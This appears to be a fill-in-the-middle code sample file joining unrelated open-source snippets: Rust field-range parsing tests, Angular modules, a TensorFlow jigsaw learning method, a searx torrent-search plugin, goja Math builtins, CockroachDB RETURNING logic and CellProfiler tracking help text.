.map(|m| (m.start(), m.end()))
.collect::<Vec<(usize, usize)>>();
let &(_, end) = ranges.last().unwrap_or(&(0, 0));
ranges.push((end, text.len()));
let mut ret = Vec::new();
for field in fields {
if let Some((start, stop)) = parse_field_range(field, ranges.len()) {
let &(begin, _) = ranges.get(start).unwrap();
let &(end, _) = ranges.get(stop).unwrap_or(&(text.len(), 0));
let first = (&text[..begin]).chars().count();
let last = first + (&text[begin..end]).chars().count();
ret.push((first, last));
}
}
ret
}
fn parse_field_range(range: &FieldRange, length: usize) -> Option<(usize, usize)> {
let length = length as i64;
match *range {
FieldRange::Single(index) => {
let index = if index >= 0 {index} else {length + index};
if index < 0 || index >= length {
None
} else {
Some((index as usize, (index + 1) as usize))
}
}
FieldRange::LeftInf(right) => {
let right = if right >= 0 {right} else {length + right};
if right <= 0 {
None
} else {
Some((0, if right > length {length as usize} else {right as usize}))
}
}
FieldRange::RightInf(left) => {
let left = if left >= 0 {left} else {length as i64 + left};
if left >= length {
None
} else {
Some((if left < 0 {0} else {left} as usize, length as usize))
}
}
FieldRange::Both(left, right) => {
let left = if left >= 0 {left} else {length + left};
let right = if right >= 0 {right} else {length + right};
if left >= right || left >= length || right < 0 {
None
} else {
Some((if left < 0 {0} else {left as usize},
if right > length {length as usize} else {right as usize}))
}
}
}
}
// A bunch of items
pub type ItemGroup = Vec<Arc<Item>>;
pub type MatchedItemGroup = Vec<MatchedItem>;
pub type Rank = [i64; 4]; // score, index, start, end
#[derive(PartialEq, Eq, Clone, Debug)]
#[allow(dead_code)]
pub enum MatchedRange {
Range(usize, usize),
Chars(Vec<usize>),
}
#[derive(Clone, Debug)]
pub struct MatchedItem {
pub item: Arc<Item>,
pub rank: Rank,
pub matched_range: Option<MatchedRange>, // range of chars that metched the pattern
}
impl MatchedItem {
pub fn builder(item: Arc<Item>) -> Self {
MatchedItem {
item: item,
rank: [0, 0, 0, 0],
matched_range: None,
}
}
pub fn matched_range(mut self, range: MatchedRange) -> Self{
self.matched_range = Some(range);
self
}
pub fn rank(mut self, rank: Rank) -> Self {
self.rank = rank;
self
}
pub fn build(self) -> Self {
self
}
}
impl Ord for MatchedItem {
fn cmp(&self, other: &MatchedItem) -> Ordering {
self.rank.cmp(&other.rank)
}
}
// `PartialOrd` needs to be implemented as well.
impl PartialOrd for MatchedItem {
fn partial_cmp(&self, other: &MatchedItem) -> Option<Ordering> {
Some(self.cmp(other))
}
}
impl PartialEq for MatchedItem {
fn eq(&self, other: &MatchedItem) -> bool {
self.rank == other.rank
}
}
impl Eq for MatchedItem {}
#[cfg(test)]
mod test {
use reader::FieldRange::*;
use regex::Regex;
#[test]
fn test_parse_field_range() {
assert_eq!(super::parse_field_range(&Single(0), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&Single(9), 10), Some((9,10)));
assert_eq!(super::parse_field_range(&Single(10), 10), None);
assert_eq!(super::parse_field_range(&Single(-1), 10), Some((9,10)));
assert_eq!(super::parse_field_range(&Single(-10), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&Single(-11), 10), None);
assert_eq!(super::parse_field_range(&LeftInf(0), 10), None);
assert_eq!(super::parse_field_range(&LeftInf(1), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&LeftInf(8), 10), Some((0,8)));
assert_eq!(super::parse_field_range(&LeftInf(10), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&LeftInf(11), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&LeftInf(-1), 10), Some((0,9)));
assert_eq!(super::parse_field_range(&LeftInf(-8), 10), Some((0,2)));
assert_eq!(super::parse_field_range(&LeftInf(-9), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&LeftInf(-10), 10), None);
assert_eq!(super::parse_field_range(&LeftInf(-11), 10), None);
assert_eq!(super::parse_field_range(&RightInf(0), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&RightInf(1), 10), Some((1,10)));
assert_eq!(super::parse_field_range(&RightInf(8), 10), Some((8,10)));
assert_eq!(super::parse_field_range(&RightInf(10), 10), None);
assert_eq!(super::parse_field_range(&RightInf(11), 10), None);
assert_eq!(super::parse_field_range(&RightInf(-1), 10), Some((9,10)));
assert_eq!(super::parse_field_range(&RightInf(-8), 10), Some((2,10)));
assert_eq!(super::parse_field_range(&RightInf(-9), 10), Some((1,10)));
assert_eq!(super::parse_field_range(&RightInf(-10), 10), Some((0, 10)));
assert_eq!(super::parse_field_range(&RightInf(-11), 10), Some((0, 10)));
assert_eq!(super::parse_field_range(&Both(0,0), 10), None);
assert_eq!(super::parse_field_range(&Both(0,1), 10), Some((0,1)));
assert_eq!(super::parse_field_range(&Both(0,10), 10), Some((0,10)));
assert_eq!(super::parse_field_range(&Both(0,11), 10), Some((0, 10)));
assert_eq!(super::parse_field_range(&Both(1,-1), 10), Some((1, 9)));
assert_eq!(super::parse_field_range(&Both(1,-9), 10), None);
assert_eq!(super::parse_field_range(&Both(1,-10), 10), None);
assert_eq!(super::parse_field_range(&Both(-9,-9), 10), None);
assert_eq!(super::parse_field_range(&Both(-9,-8), 10), Some((1, 2)));
assert_eq!(super::parse_field_range(&Both(-9, 0), 10), None);
assert_eq!(super::parse_field_range(&Both(-9, 1), 10), None);
assert_eq!(super::parse_field_range(&Both(-9, 2), 10), Some((1,2)));
assert_eq!(super::parse_field_range(&Both(-1,0), 10), None);
assert_eq!(super::parse_field_range(&Both(11,20), 10), None);
assert_eq!(super::parse_field_range(&Both(-10,-10), 10), None);
}
#[test]
fn test_parse_transform_fields() {
// delimiter is ","
let re = Regex::new(".*?,").unwrap();
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![Single(1),
Single(3),
Single(-1),
Single(-7)]),
"B,D,F");
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![LeftInf(3),
LeftInf(-5),
LeftInf(-6)]),
"A,B,C,A,");
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![RightInf(4),
RightInf(-2),
RightInf(-1),
RightInf(7)]),
"E,FE,FF");
assert_eq!(super::parse_transform_fields(&re, &"A,B,C,D,E,F",
&vec![Both(2,3),
Both(-9,2),
Both(5,10),
Both(-9,-4)]),
"C,A,B,FA,B,");
}
#[test]
fn test_parse_matching_fields() {
// delimiter is ","
let re = Regex::new(".*?,").unwrap();
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![Single(1),
Single(3),
Single(-1),
Single(-7)]),
vec![(2,4), (6,8), (10,11)]);
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![LeftInf(3),
LeftInf(-5),
LeftInf(-6)]),
vec![(0, 6), (0, 2)]);
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![RightInf(4),
RightInf(-2),
RightInf(-1),
RightInf(7)]),
vec![(8, 11), (8, 11), (10, 11)]);
assert_eq!(super::parse_matching_fields(&re, &"中,华,人,民,E,F",
&vec![Both(2,3),
Both(-9,2),
Both(5,10),
Both(-9,-4)]),
vec![(4, 6), (0, 4), (10,11), (0, 4)]);
}
}<|fim▁end|> | //------------------------------------------------------
// +- T -> trans+ANSI | ANSI |
<|file_name|>mdc-slider-e2e-module.ts<|end_file_name|><|fim▁begin|>/**
* @license
* Copyright Google LLC All Rights Reserved.
*<|fim▁hole|>
import {NgModule} from '@angular/core';
import {MatSliderModule} from '@angular/material-experimental/mdc-slider';
import {MdcSliderE2e} from './mdc-slider-e2e';
@NgModule({
imports: [MatSliderModule],
declarations: [MdcSliderE2e],
})
export class MdcSliderE2eModule {}<|fim▁end|> | * Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/ |
<|file_name|>filterList.ts<|end_file_name|><|fim▁begin|>import { Pipe } from '@angular/core';
import { Config } from './config';
@Pipe({
name: 'filterList'
})
export class FilterList {
transform(items: any[], args: any): any[] {
if (items.length === 0 || args.length < Config.minFilterInput) return items;
return items.filter(item => {
return Object.keys(item).some(k => {<|fim▁hole|> });
}
}<|fim▁end|> | return Config.filterTypes.indexOf(k) > -1 ? new RegExp(args, 'i').test(item[k]) : false;
}); |
<|file_name|>jigsaw.py<|end_file_name|><|fim▁begin|>from __future__ import division, print_function, absolute_import
import selfsup
import tensorflow as tf
import os
from .base import Method
from collections import OrderedDict
import deepdish as dd
import numpy as np
import itertools
import selfsup.jigsaw
PERMUTATIONS = selfsup.jigsaw.load_permutations(selfsup.res('jigsaw/permutations_100_max.bin'))
def _make_random_patches(x, y, patch_size, permutations, size=3):
batch_size = x.get_shape().as_list()[0]
crop_size = x.get_shape().as_list()[1]
perm_idx = tf.expand_dims(y, 1)
perm = tf.gather_nd(permutations, perm_idx)
WINDOW_SIZE = crop_size // size
N = x.get_shape().as_list()[0]
C = x.get_shape().as_list()[3]
patches = []
for i, j in dd.multi_range(size, size):
#tf.slice(x, [
M = WINDOW_SIZE - patch_size + 1
assert M > 0, f'Jigsaw: Window size ({WINDOW_SIZE}) and patch size ({patch_size}) not compatible'
limit = np.array([1, M, M, 1])
offset = np.array([0, i * WINDOW_SIZE, j * WINDOW_SIZE, 0]) + tf.random_uniform(
[4], dtype=tf.int32,
maxval=M,
) % limit
patch = tf.slice(x, offset, [N, patch_size, patch_size, C])
patches.append(patch)
patches1 = tf.stack(patches, axis=1)
xyz = np.arange(batch_size)[:, np.newaxis] * size**2 + (perm - 1)
#import ipdb
#ipdb.set_trace()
perm0 = tf.reshape(xyz, [-1])
patches_flat = tf.reshape(patches1, [-1] + patches1.get_shape().as_list()[2:])
#import ipdb
##ipdb.set_trace()
patches2 = tf.gather(patches_flat, perm0)
#return tf.reshape(patches2, [-1, PATCH_SIZE, PATCH_SIZE, C])
return patches2
class Jigsaw(Method):
def __init__(self, name, basenet, loader, patch_size=75, size=3,
reduce_channels=128, use_scalers=False):
self.name = name
self.basenet = basenet
self._size = size
self._patch_size = patch_size
self._loader = loader
self._reduce_channels = reduce_channels
if size == 3:
self._permutations = PERMUTATIONS
elif size == 2:
# They are 1-based due to the permutations file
self._permutations = 1 + np.array(list(itertools.permutations(range(size**2))))
self._use_scalers = use_scalers
@property
def basenet_settings(self):
return {'convolutional': False}
def batch(self):
x, _ = self._loader.batch()
y = tf.random_uniform([self._loader.batch_size], dtype=tf.int32, maxval=len(self._permutations))
patches = _make_random_patches(x, y, self._patch_size, self._permutations, size=self._size)
pad_both = self.basenet.canonical_input_size - self._patch_size
pad_lo = pad_both // 2
pad_up = pad_both - pad_lo
#paddings = [[0, 0], [pad_lo, pad_up], [pad_lo, pad_up], [0, 0]]
#pad_patches = tf.pad(patches, paddings=paddings, mode='REFLECT')
pad_patches = patches
self._y = y
extra = {'permutation': y}
return pad_patches, extra
def build_network(self, network, extra, phase_test, global_step):
info = selfsup.info.create(scale_summary=True)
if self._size == 3:
z = network['activations']['pool5']
else:
z = network['activations']['top']
#z = tf.squeeze(z, [1, 2])
z = tf.reshape(z, (z.get_shape().as_list()[0], -1))
if self._use_scalers:
z = selfsup.ops.scale(z, name='scale')
#W_init = tf.contrib.layers.variance_scaling_initializer()
W_init = tf.random_normal_initializer(0.0, 0.0001)
b_init = tf.constant_initializer(0.0)
reduce_ch = self._reduce_channels
with tf.variable_scope('reduction'):
c_o = reduce_ch
reduce_W = tf.get_variable('weights', [z.get_shape().as_list()[1], c_o], dtype=tf.float32,
initializer=W_init)
reduce_b = tf.get_variable('biases', [c_o], dtype=tf.float32,
initializer=b_init)
z = tf.nn.xw_plus_b(z, reduce_W, reduce_b)
z = tf.nn.relu(z)
z = tf.reshape(z, [self._loader.batch_size, -1, z.get_shape().as_list()[-1]])
z = tf.concat(tf.unstack(z, axis=1), 1)
with tf.variable_scope('jigsaw'):
c_o = len(self._permutations)
jigsaw_W = tf.get_variable('weights', [z.get_shape().as_list()[1], c_o], dtype=tf.float32,
initializer=W_init)
jigsaw_b = tf.get_variable('biases', [c_o], dtype=tf.float32,
initializer=b_init)
z = tf.nn.xw_plus_b(z, jigsaw_W, jigsaw_b)
with tf.variable_scope('primary_loss'):
loss_each = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=self._y, logits=z)
primary_loss = tf.reduce_mean(loss_each)
with tf.name_scope('weight_decay'):
wd = 1e-6
l2_loss = tf.nn.l2_loss(reduce_W) + tf.nn.l2_loss(jigsaw_W)
weight_decay = wd * l2_loss
with tf.name_scope('loss'):
loss = weight_decay + primary_loss
variables = info['vars']
self.losses = OrderedDict([
('main', primary_loss),
('+weight_decay', weight_decay),
])
self.primary_loss = primary_loss
self.loss = loss
self.feedback_variables = []
<|fim▁hole|> info['activations']['loss'] = loss
info['activations']['weight_decay'] = weight_decay
return info
def feedback(self, variables, iteration):
pass<|fim▁end|> | info['activations']['primary_loss'] = primary_loss |
<|file_name|>kickass.py<|end_file_name|><|fim▁begin|>"""
Kickass Torrent (Videos, Music, Files)
@website https://kickass.so
@provide-api no (nothing found)
@using-api no
@results HTML (using search portal)
@stable yes (HTML can change)
@parse url, title, content, seed, leech, magnetlink
"""
from urlparse import urljoin
from cgi import escape
from urllib import quote
from lxml import html
from operator import itemgetter
from searx.engines.xpath import extract_text
# engine dependent config
categories = ['videos', 'music', 'files']
paging = True
# search-url
url = 'https://kickass.to/'
search_url = url + 'search/{search_term}/{pageno}/'
# specific xpath variables
magnet_xpath = './/a[@title="Torrent magnet link"]'
torrent_xpath = './/a[@title="Download torrent file"]'
content_xpath = './/span[@class="font11px lightgrey block"]'
# do search-request
def request(query, params):
params['url'] = search_url.format(search_term=quote(query),
pageno=params['pageno'])
return params
# get response from search-request
def response(resp):
results = []
dom = html.fromstring(resp.text)<|fim▁hole|> # return empty array if nothing is found
if not search_res:
return []
# parse results
for result in search_res[1:]:
link = result.xpath('.//a[@class="cellMainLink"]')[0]
href = urljoin(url, link.attrib['href'])
title = extract_text(link)
content = escape(extract_text(result.xpath(content_xpath)))
seed = result.xpath('.//td[contains(@class, "green")]/text()')[0]
leech = result.xpath('.//td[contains(@class, "red")]/text()')[0]
filesize = result.xpath('.//td[contains(@class, "nobr")]/text()')[0]
filesize_multiplier = result.xpath('.//td[contains(@class, "nobr")]//span/text()')[0]
files = result.xpath('.//td[contains(@class, "center")][2]/text()')[0]
# convert seed to int if possible
if seed.isdigit():
seed = int(seed)
else:
seed = 0
# convert leech to int if possible
if leech.isdigit():
leech = int(leech)
else:
leech = 0
# convert filesize to byte if possible
try:
filesize = float(filesize)
# convert filesize to byte
if filesize_multiplier == 'TB':
filesize = int(filesize * 1024 * 1024 * 1024 * 1024)
elif filesize_multiplier == 'GB':
filesize = int(filesize * 1024 * 1024 * 1024)
elif filesize_multiplier == 'MB':
filesize = int(filesize * 1024 * 1024)
elif filesize_multiplier == 'KB':
filesize = int(filesize * 1024)
except:
filesize = None
# convert files to int if possible
if files.isdigit():
files = int(files)
else:
files = None
magnetlink = result.xpath(magnet_xpath)[0].attrib['href']
torrentfile = result.xpath(torrent_xpath)[0].attrib['href']
torrentfileurl = quote(torrentfile, safe="%/:=&?~#+!$,;'@()*")
# append result
results.append({'url': href,
'title': title,
'content': content,
'seed': seed,
'leech': leech,
'filesize': filesize,
'files': files,
'magnetlink': magnetlink,
'torrentfile': torrentfileurl,
'template': 'torrent.html'})
# return results sorted by seeder
return sorted(results, key=itemgetter('seed'), reverse=True)<|fim▁end|> |
search_res = dom.xpath('//table[@class="data"]//tr')
|
<|file_name|>builtin_math.go<|end_file_name|><|fim▁begin|>package goja
import (
"math"
)
func (r *Runtime) math_abs(call FunctionCall) Value {
return floatToValue(math.Abs(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_acos(call FunctionCall) Value {
return floatToValue(math.Acos(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_asin(call FunctionCall) Value {
return floatToValue(math.Asin(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_atan(call FunctionCall) Value {
return floatToValue(math.Atan(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_atan2(call FunctionCall) Value {
y := call.Argument(0).ToFloat()
x := call.Argument(1).ToFloat()
return floatToValue(math.Atan2(y, x))
}
func (r *Runtime) math_ceil(call FunctionCall) Value {
return floatToValue(math.Ceil(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_cos(call FunctionCall) Value {
return floatToValue(math.Cos(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_exp(call FunctionCall) Value {
return floatToValue(math.Exp(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_floor(call FunctionCall) Value {
return floatToValue(math.Floor(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_log(call FunctionCall) Value {
return floatToValue(math.Log(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_max(call FunctionCall) Value {
if len(call.Arguments) == 0 {
return _negativeInf
}
result := call.Arguments[0].ToFloat()
if math.IsNaN(result) {
return _NaN
}
for _, arg := range call.Arguments[1:] {
f := arg.ToFloat()
if math.IsNaN(f) {
return _NaN
}
result = math.Max(result, f)
}
return floatToValue(result)
}
func (r *Runtime) math_min(call FunctionCall) Value {
if len(call.Arguments) == 0 {
return _positiveInf
}
result := call.Arguments[0].ToFloat()
if math.IsNaN(result) {
return _NaN
}
for _, arg := range call.Arguments[1:] {
f := arg.ToFloat()
if math.IsNaN(f) {
return _NaN
}
result = math.Min(result, f)
}
return floatToValue(result)
}
func (r *Runtime) math_pow(call FunctionCall) Value {
x := call.Argument(0)
y := call.Argument(1)
if x, ok := x.assertInt(); ok {
if y, ok := y.assertInt(); ok && y >= 0 && y < 64 {
if y == 0 {
return intToValue(1)
}
if x == 0 {
return intToValue(0)
}
ip := ipow(x, y)
if ip != 0 {
return intToValue(ip)
}
}
}
return floatToValue(math.Pow(x.ToFloat(), y.ToFloat()))
}
func (r *Runtime) math_random(call FunctionCall) Value {
return floatToValue(r.rand())
}
func (r *Runtime) math_round(call FunctionCall) Value {
f := call.Argument(0).ToFloat()
if math.IsNaN(f) {
return _NaN
}
if f == 0 && math.Signbit(f) {
return _negativeZero
}
t := math.Trunc(f)
if f >= 0 {
if f-t >= 0.5 {
return floatToValue(t + 1)
}
} else {
if t-f > 0.5 {
return floatToValue(t - 1)
}
}
return floatToValue(t)
}
func (r *Runtime) math_sin(call FunctionCall) Value {
return floatToValue(math.Sin(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_sqrt(call FunctionCall) Value {
return floatToValue(math.Sqrt(call.Argument(0).ToFloat()))
}
func (r *Runtime) math_tan(call FunctionCall) Value {
return floatToValue(math.Tan(call.Argument(0).ToFloat()))
}
func (r *Runtime) createMath(val *Object) objectImpl {
m := &baseObject{
class: "Math",
val: val,
extensible: true,
prototype: r.global.ObjectPrototype,
}
m.init()
m._putProp("E", valueFloat(math.E), false, false, false)
m._putProp("LN10", valueFloat(math.Ln10), false, false, false)<|fim▁hole|> m._putProp("LOG2E", valueFloat(math.Log2E), false, false, false)
m._putProp("LOG10E", valueFloat(math.Log10E), false, false, false)
m._putProp("PI", valueFloat(math.Pi), false, false, false)
m._putProp("SQRT1_2", valueFloat(sqrt1_2), false, false, false)
m._putProp("SQRT2", valueFloat(math.Sqrt2), false, false, false)
m._putProp("abs", r.newNativeFunc(r.math_abs, nil, "abs", nil, 1), true, false, true)
m._putProp("acos", r.newNativeFunc(r.math_acos, nil, "acos", nil, 1), true, false, true)
m._putProp("asin", r.newNativeFunc(r.math_asin, nil, "asin", nil, 1), true, false, true)
m._putProp("atan", r.newNativeFunc(r.math_atan, nil, "atan", nil, 1), true, false, true)
m._putProp("atan2", r.newNativeFunc(r.math_atan2, nil, "atan2", nil, 2), true, false, true)
m._putProp("ceil", r.newNativeFunc(r.math_ceil, nil, "ceil", nil, 1), true, false, true)
m._putProp("cos", r.newNativeFunc(r.math_cos, nil, "cos", nil, 1), true, false, true)
m._putProp("exp", r.newNativeFunc(r.math_exp, nil, "exp", nil, 1), true, false, true)
m._putProp("floor", r.newNativeFunc(r.math_floor, nil, "floor", nil, 1), true, false, true)
m._putProp("log", r.newNativeFunc(r.math_log, nil, "log", nil, 1), true, false, true)
m._putProp("max", r.newNativeFunc(r.math_max, nil, "max", nil, 2), true, false, true)
m._putProp("min", r.newNativeFunc(r.math_min, nil, "min", nil, 2), true, false, true)
m._putProp("pow", r.newNativeFunc(r.math_pow, nil, "pow", nil, 2), true, false, true)
m._putProp("random", r.newNativeFunc(r.math_random, nil, "random", nil, 0), true, false, true)
m._putProp("round", r.newNativeFunc(r.math_round, nil, "round", nil, 1), true, false, true)
m._putProp("sin", r.newNativeFunc(r.math_sin, nil, "sin", nil, 1), true, false, true)
m._putProp("sqrt", r.newNativeFunc(r.math_sqrt, nil, "sqrt", nil, 1), true, false, true)
m._putProp("tan", r.newNativeFunc(r.math_tan, nil, "tan", nil, 1), true, false, true)
return m
}
func (r *Runtime) initMath() {
r.addToGlobal("Math", r.newLazyObject(r.createMath))
}<|fim▁end|> | m._putProp("LN2", valueFloat(math.Ln2), false, false, false) |
<|file_name|>returning.go<|end_file_name|><|fim▁begin|>// Copyright 2016 The Cockroach Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");<|fim▁hole|>//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
// implied. See the License for the specific language governing
// permissions and limitations under the License.
//
// Author: Matt Jibson ([email protected])
package sql
import "github.com/cockroachdb/cockroach/sql/parser"
// returningNode accumulates the results for a RETURNING clause. If the rows are empty, we just
// keep track of the count.
type returningNode struct {
valuesNode
rowCount int
}
// returningHelper implements the logic used for statements with RETURNING clauses. It accumulates
// result rows, one for each call to append().
type returningHelper struct {
p *planner
results *returningNode
// Processed copies of expressions from ReturningExprs.
exprs parser.Exprs
qvals qvalMap
}
func makeReturningHelper(p *planner, r parser.ReturningExprs,
alias string, tablecols []ColumnDescriptor) (returningHelper, error) {
rh := returningHelper{p: p, results: &returningNode{}}
if len(r) == 0 {
return rh, nil
}
rh.results.columns = make([]ResultColumn, 0, len(r))
table := tableInfo{
columns: makeResultColumns(tablecols, 0),
alias: alias,
}
rh.qvals = make(qvalMap)
rh.exprs = make([]parser.Expr, 0, len(r))
for _, target := range r {
if isStar, cols, exprs, err := checkRenderStar(target, &table, rh.qvals); err != nil {
return returningHelper{}, err
} else if isStar {
rh.exprs = append(rh.exprs, exprs...)
rh.results.columns = append(rh.results.columns, cols...)
continue
}
// When generating an output column name it should exactly match the original
// expression, so determine the output column name before we perform any
// manipulations to the expression.
outputName := getRenderColName(target)
expr, err := resolveQNames(&table, rh.qvals, target.Expr)
if err != nil {
return returningHelper{}, err
}
typ, err := expr.TypeCheck(rh.p.evalCtx.Args)
if err != nil {
return returningHelper{}, err
}
rh.exprs = append(rh.exprs, expr)
rh.results.columns = append(rh.results.columns, ResultColumn{Name: outputName, Typ: typ})
}
return rh, nil
}
// append adds a result row. The row is computed according to the ReturningExprs, with input values
// from rowVals.
func (rh *returningHelper) append(rowVals parser.DTuple) error {
if rh.exprs == nil {
rh.results.rowCount++
return nil
}
rh.qvals.populateQVals(rowVals)
resrow := make(parser.DTuple, len(rh.exprs))
for i, e := range rh.exprs {
d, err := e.Eval(rh.p.evalCtx)
if err != nil {
return err
}
resrow[i] = d
}
rh.results.rows = append(rh.results.rows, resrow)
return nil
}
// getResults returns the results as a returningNode.
func (rh *returningHelper) getResults() *returningNode {
return rh.results
}<|fim▁end|> | // you may not use this file except in compliance with the License.
// You may obtain a copy of the License at |
<|file_name|>trackobjects.py<|end_file_name|><|fim▁begin|>from cellprofiler.gui.help import USING_METADATA_HELP_REF, USING_METADATA_GROUPING_HELP_REF, LOADING_IMAGE_SEQ_HELP_REF
TM_OVERLAP = 'Overlap'
TM_DISTANCE = 'Distance'
TM_MEASUREMENTS = 'Measurements'
TM_LAP = "LAP"
TM_ALL = [TM_OVERLAP, TM_DISTANCE, TM_MEASUREMENTS,TM_LAP]
LT_NONE = 0
LT_PHASE_1 = 1
LT_SPLIT = 2
LT_MITOSIS = 3
LT_GAP = 4
KM_VEL = 1
KM_NO_VEL = 0
KM_NONE = -1
'''Random motion model, for instance Brownian motion'''
M_RANDOM = "Random"
'''Velocity motion model, object position depends on prior velocity'''
M_VELOCITY = "Velocity"
'''Random and velocity models'''
M_BOTH = "Both"
RADIUS_STD_SETTING_TEXT = 'Number of standard deviations for search radius'
RADIUS_LIMIT_SETTING_TEXT = 'Search radius limit, in pixel units (Min,Max)'
ONLY_IF_2ND_PHASE_LAP_TEXT = '''<i>(Used only if the %(TM_LAP)s tracking method is applied and the second phase is run)</i>'''%globals()
import cellprofiler.icons
from cellprofiler.gui.help import PROTIP_RECOMEND_ICON, PROTIP_AVOID_ICON, TECH_NOTE_ICON
__doc__ = """
<b>Track Objects</b> allows tracking objects throughout sequential
frames of a series of images, so that from frame to frame
each object maintains a unique identity in the output measurements
<hr>
This module must be placed downstream of a module that identifies objects
(e.g., <b>IdentifyPrimaryObjects</b>). <b>TrackObjects</b> will associate each
object with the same object in the frames before and after. This allows the study
of objects' lineages and the timing and characteristics of dynamic events in
movies.
<p>Images in CellProfiler are processed sequentially by frame (whether loaded as a
series of images or a movie file). To process a collection of images/movies,
you will need to do the following:
<ul>
<li>Define each individual movie using metadata
either contained within the image file itself or as part of the images nomenclature
or folder structure. %(USING_METADATA_HELP_REF)s.</li>
<li>Group the movies to make sure
that each image sequence is handled individually. %(USING_METADATA_GROUPING_HELP_REF)s.
</li>
</ul>
For complete details, see <i>%(LOADING_IMAGE_SEQ_HELP_REF)s</i>.</p>
<p>For an example pipeline using TrackObjects, see the CellProfiler
<a href="http://www.cellprofiler.org/examples.shtml#Tracking">Examples</a> webpage.</p>
<h4>Available measurements</h4>
<b>Object measurements</b>
<ul>
<li><i>Label:</i> Each tracked object is assigned a unique identifier (label).
Child objects resulting from a split or merge are assigned the label of the ancestor.</li>
<li><i>ParentImageNumber, ParentObjectNumber:</i> The <i>ImageNumber</i> and
<i>ObjectNumber</i> of the parent object in the prior frame. For a split, each
child object will have the label of the object it split from. For a merge,
the child will have the label of the closest parent.</li>
<li><i>TrajectoryX, TrajectoryY:</i> The direction of motion (in x and y coordinates) of the
object from the previous frame to the current frame.</li>
<li><i>DistanceTraveled:</i> The distance traveled by the object from the
previous frame to the current frame (calculated as the magnitude of
the trajectory vectors).</li>
<li><i>Displacement:</i> The shortest distance traveled by the object from its
initial starting position to the position in the current frame. That is, it is
the straight-line path between the two points.</li>
<li><i>IntegratedDistance:</i> The total distance traveled by the object during
the lifetime of the object.</li>
<li><i>Linearity:</i> A measure of how linear the object trajectity is during the
object lifetime. Calculated as (displacement from initial to final
location)/(integrated object distance). Value is in range of [0,1].</li>
<li><i>Lifetime:</i> The number of frames an objects has existed. The lifetime starts
at 1 at the frame when an object appears, and is incremented with each frame that the
object persists. At the final frame of the image set/movie, the
lifetimes of all remaining objects are output.</li>
<li><i>FinalAge:</i> Similar to <i>LifeTime</i> but is only output at the final
frame of the object's life (or the movie ends, whichever comes first). At this point,
the final age of the object is output; no values are stored for earlier frames.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> This value
is useful if you want to plot a histogram of the object lifetimes; all but the final age
can be ignored or filtered out.</dd>
</dl></li>
</ul>
The following object measurements are specific to the %(TM_LAP)s tracking method:
<ul>
<li><i>LinkType:</i> The linking method used to link the object to its parent.
Possible values are
<ul>
<li><b>%(LT_NONE)d</b>: The object was not linked to a parent.</li>
<li><b>%(LT_PHASE_1)d</b>: The object was linked to a parent in the previous frame.</li>
<li><b>%(LT_SPLIT)d</b>: The object is linked as the start of a split path.</li>
<li><b>%(LT_MITOSIS)s</b>: The object was linked to its parent as a daughter of
a mitotic pair.</li>
<li><b>%(LT_GAP)d</b>: The object was linked to a parent in a frame prior to the
previous frame (a gap).</li>
</ul>
Under some circumstances, multiple linking methods may apply to a given object, e.g, an
object may be both the beginning of a split path and not have a parent. However, only
one linking method is assigned.</li>
<li><i>MovementModel:</i>The movement model used to track the object.
<ul>
<li><b>%(KM_NO_VEL)d</b>: The <i>%(M_RANDOM)s</i> model was used.</li>
<li><b>%(KM_VEL)d</b>: The <i>%(M_VELOCITY)s</i> model was used.</li>
<li><b>-1</b>: Neither model was used. This can occur under two circumstances:
<ul>
<li>At the beginning of a trajectory, when there is no data to determine the model as
yet.</li>
<li>At the beginning of a closed gap, since a model was not actually applied to make
the link in the first phase.</li>
</ul></li>
</ul>
</li>
<li><i>LinkingDistance:</i>The difference between the propagated position of an
object and the object to which it is matched.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> A slowly decaying histogram of
these distances indicates that the search radius is large enough. A cut-off histogram
is a sign that the search radius is too small.</dd>
</dl></li>
<li><i>StandardDeviation:</i>The Kalman filter maintains a running estimate
of the variance of the error in estimated position for each model.
This measurement records the linking distance divided by the standard deviation
of the error when linking the object with its parent.
<dl>
<dd><img src="memory:%(PROTIP_RECOMEND_ICON)s"> This value is multiplied by
the <i>"%(RADIUS_STD_SETTING_TEXT)s"</i> setting to constrain the search distance.
A histogram of this value can help determine if the <i>"%(RADIUS_LIMIT_SETTING_TEXT)s"</i>
setting is appropriate.</dd>
</dl>
</li>
<li><i>GapLength:</i> The number of frames between an object and its parent.
For instance, an object in frame 3 with a parent in frame 1 has a gap length of
2.</li>
<li><i>GapScore:</i> If an object is linked to its parent by bridging a gap,
this value is the score for the gap.</li>
<li><i>SplitScore:</i> If an object linked to its parent via a split, this
value is the score for the split.</li>
<li><i>MergeScore:</i> If an object linked to a child via a merge, this value is
the score for the merge.</li>
<li><i>MitosisScore:</i> If an object linked to two children via a mitosis,
